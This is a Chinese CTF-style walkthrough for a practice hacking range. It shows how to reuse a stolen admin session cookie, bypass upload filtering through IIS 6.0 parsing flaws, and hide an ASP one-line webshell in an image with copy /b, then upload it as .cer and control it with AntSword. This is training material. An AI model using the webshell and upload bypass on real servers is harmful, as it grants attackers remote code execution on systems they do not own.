封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

这篇具有很好参考价值的文章主要介绍了封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

封神台 https://hack.zkaq.cn

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)一、1.通过修改Cookie登录后台(没用重打)

        2,上传SHELL!3,Flag在网站根目录(flag.php)

        3.上传图片时建议上传小文件,建议用QQ表情
        尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,
        看到了后台功能!然后要做的,就是找一个上传点,上传自己的外壳了!

一.开始 

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 这是用上一章XSS的cookie     用bp抓包也可以

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC

 复制粘贴即可封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 点击准备好了吗或者f5刷新进入网页

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

二、分析Microsoft-IIS/6.0

可能存在IIS解析漏洞:

    1.目录解析 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。
    2.文件解析 对于 *.asp;.jpg 像这种畸形文件名在";"后面的直接被忽略,也就是说当成 *.asp文件执行。
    3.IIS6.0 默认的可执行文件除了asp还包含这三种 *.asa *.cer *.cdx。

1.查看上传目录 和上传文件限制

 系统管理 网站配置封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

2.确定上传点

添加下载程序和添加产品都可

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 三、生成木马、上传木马

注意

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

流程:  图片 ----生成、植入木马---木马图片---以.cer上传----蚁剑----找到目录flag

 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

1.找一张空间较小的图片

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

2. 以万能的txt记事本打开

发现是乱码 正常

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

3.写个txt 改后缀名为php(网页)

        mm.txt里面写一句话木马 

        简单的  eval: 执行    request:从用户那里取得的信息   木马:执行从用户那里取得的信息

<%eval request ("a")%>

4. 复制生成带有木马的图片

copy 1.jpg/b+mm.php 2.jpg
#复制 原图片/b+木马.php #新图片

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

4.用记事本查看木马图片

末尾发现一句话木马代表成功生成

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

5.改文件后缀名2.jpg改为2.cer 上传

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 复制到url 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

6. 在蚁剑添加这个网址

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 直接打开FLAG!.txt

封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

 拿到flag  zkz{G3t_the_admin!Sh3ll}文章来源地址https://www.toymoban.com/news/detail-470089.html

到了这里,关于封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 小黑子—spring:第四章 事务控制与整合web环境

    事务是开发中必不可少的东西,使用JDBC开发时,我们使用connnection对事务进行控制,使用MyBatis时,我们使用SqlSession对事务进行控制,缺点显而易见,当我们切换数据库访问技术时,事务控制的方式总会变化,Spring 就将这些技术基础上,提供了统一的控制事务的接口。Spring的

    2024年02月06日
    浏览(40)
  • 第四章 磁盘设备

    第四章 磁盘设备 一、 关于挂装的基本常识 •与 DOS/Windows 采用驱动器标识符(A:、B:、C:)使用磁 盘设备的方法不同。Linux 采用单根目录树管理全部文件系 统。磁盘设备必须挂载到系统目录树上才能使用。 (Linux 启动过程已完成对/、/ boot 和/swap 三个分区的挂装) •所谓挂

    2024年02月03日
    浏览(45)
  • 第四章 搜索功能

    指定返回的字段 在ES中,通过_source子句可以设定返回结果的字段。_source指向一个JSON数组,数组中的元素是希望返回的字段名称。 例如,通过source指定查询字段 结果计数 给前端传递搜索匹配结果的文档条数,即需要对搜索结果进行计数。ES提供了_count API功能,在该API中,用

    2023年04月08日
    浏览(40)
  • 第四章 Text

    在本章中,您将学习如何在页面上绘制文本。 绘图文本是 PDF 图形中最复杂的部分,但它也是帮助 PDF 击败竞争对手成为当今国际标准的原因。 当其他原始播放器将文本转换为光栅图像或矢量路径(以保持视觉完整性)时,PDF 的发明者知道用户需要可以搜索和复制的文本,而

    2024年02月06日
    浏览(46)
  • 第四章 RPC 调用

    通过以上案例我们发现,Http请求调用服务实例属实过于麻烦。其实对于请求同一个服务,很多步骤都是相同的,例如:服务名,地址,httpClient 创建步骤等。 RPC的出现,就是为了解决这一问题。 RPC: 即我们常说的远程过程调用,就是像调用本地方法一样调用远程方法,通信协

    2024年02月04日
    浏览(49)
  • 四,Eureka 第四章

           2.3.4修改主启动类 标注为Eureka客户端           springcloud-eureka-sever-7001 springcloud-eureka-sever-7001   springcloud-eureka-sever003           5.25编写PaymentMapper接口   5.    

    2024年02月15日
    浏览(82)
  • Linux第四章

    ctrl+c :强制停止(Linux某些程序的运行;命令输入错误) ctrl+d :退出或登出(退出账户的登录;或者退出某些特定程序的专属页面) history :查看历史输入过的命令(!命令前缀,自动执行上一次匹配前缀的命令,不能搜索太久的) ctrl+r :输入内容去匹配历史命令(如果搜索到的内

    2024年02月01日
    浏览(43)
  • 第四章,登录注册

    目录 4.1 添加注册页面 4.2 注册表单验证 4.3提交注册信息 4.4 完善注册功能

    2024年02月12日
    浏览(38)
  • 第四章 单例模式

    代码示例 优缺点:可能会造成内存的浪费,但也只能浪费内存 代码示例 代码示例 缺点:多线程不安全 缺点效率太低 在类加载时,静态内部类没有调用是不会进行类加载的,当被调用时才会被加载,而且只加载一次,加载时线程安全 优缺点

    2023年04月21日
    浏览(56)
  • 第四章-边界安全

    1)什么是防火墙 墙,始于防,忠于守。从古至今,墙予人以安全之意。 防御外网对内网的入侵 防火墙是一种 网络安全设备或系统 ,用于监控和控制网络流量,防止未经授权的访问和攻击。防火墙可以根据预定的规则和策略,过滤入站和出站数据包,保护网络的安全性和完

    2024年01月19日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包